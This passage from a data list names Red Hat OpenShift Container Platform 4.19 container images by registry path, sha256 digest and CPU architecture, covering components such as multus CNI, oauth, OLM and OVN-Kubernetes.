"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
